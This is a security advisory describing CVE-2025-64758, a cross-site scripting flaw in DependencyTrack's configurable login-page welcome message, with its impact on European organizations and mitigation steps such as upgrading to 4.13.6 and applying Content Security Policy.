CVE-2025-64758 is a cross-site scripting (XSS) vulnerability classified under CWE-79, affecting the frontend component of DependencyTrack, an open-source software supply chain risk management platform. Since version 4.12.0, DependencyTrack allows administrators (users with SYSTEM_CONFIGURATION permission) to configure a customizable HTML welcome message displayed on the login page for branding purposes. In versions prior to 4.13.6, this HTML content was not properly sanitized before rendering, enabling injection of arbitrary JavaScript code. When an administrator configures malicious script within the welcome message, any user visiting the login page will have that script executed in their browser context. This can lead to theft of session tokens, redirection to malicious sites, or other client-side attacks compromising confidentiality and integrity. The vulnerability requires high privileges to configure the malicious payload and user interaction to trigger the script execution. The issue was addressed in DependencyTrack version 4.13.6 by implementing proper input sanitization and output encoding to neutralize potentially harmful scripts. No public exploits have been reported, but the vulnerability poses a risk in environments where multiple users access the login page and administrators may be compromised or negligent.

For European organizations, this vulnerability could lead to targeted attacks against users accessing the DependencyTrack login page, potentially exposing session credentials or enabling further client-side attacks. Although exploitation requires administrator privileges to inject malicious scripts, the impact on confidentiality and integrity is significant since arbitrary JavaScript can be executed in the context of any user visiting the login page. This could facilitate lateral movement, credential theft, or phishing within organizations relying on DependencyTrack for software supply chain security. The availability impact is minimal as the vulnerability does not affect system uptime. Organizations in Europe using affected versions risk exposure of sensitive information and erosion of trust in their software supply chain risk management processes. Given the critical role of DependencyTrack in managing software component risks, exploitation could indirectly affect compliance with European data protection regulations such as GDPR if personal data is compromised.

European organizations should immediately upgrade DependencyTrack to version 4.13.6 or later, where the vulnerability is fixed. Until upgrading, restrict SYSTEM_CONFIGURATION permissions strictly to trusted administrators and enforce strong access controls and monitoring on these accounts. Implement Content Security Policy (CSP) headers on the DependencyTrack web server to limit the execution of unauthorized scripts. Regularly audit the welcome message configuration for unauthorized or suspicious HTML content. Educate administrators on secure configuration practices and the risks of injecting untrusted HTML. Additionally, monitor web server logs and user activity for unusual access patterns or attempts to exploit the login page. Employ web application firewalls (WAFs) with rules targeting XSS payloads as a temporary protective measure. Finally, integrate DependencyTrack updates into the organization's patch management process to ensure timely remediation of future vulnerabilities.